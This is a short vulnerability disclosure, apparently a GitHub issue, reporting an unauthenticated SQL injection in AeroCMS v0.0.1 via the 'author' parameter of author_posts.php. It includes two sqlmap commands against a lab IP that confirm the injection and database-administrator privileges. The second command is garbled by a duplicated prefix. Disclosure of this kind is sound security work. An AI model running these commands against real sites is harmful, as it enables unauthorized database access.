AeroCMS icon indicating copy to clipboard operation
AeroCMS copied to clipboard

Published 20 hours ago verified publisher icon MegaTKC

AeroCMS v0.0.1 Frontend sql Injection vulnerability

Open w4n95 opened this issue 2 years ago • 0 comments

  • Description

AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the "author" parameter at \author_posts.php. This vulnerability allows attackers does not require authentication to obtain database administrator privileges and access database information. etc.

  • Reproduct

  1. No login required. execute sqlmap command: python sqlmap.py -u "http://192.168.111.169/AeroCMS/author_posts.php?author=admin&p_id=1" -p "author",we can see SQL injection vulnerability exists in the "author"parameter image

  2. execute sqlmap command: python sqlmap.py -u "python sqlmap.py -u "http://192.168.111.169/AeroCMS/author_posts.php?author=admin&p_id=1" -p "author" --is-dba,we can see "DBA: TRUE" image

  • Vulnerable Code

The “author” parameter is not escaped before executing the sql query statement image

w4n95 avatar Nov 27 '22 13:11 w4n95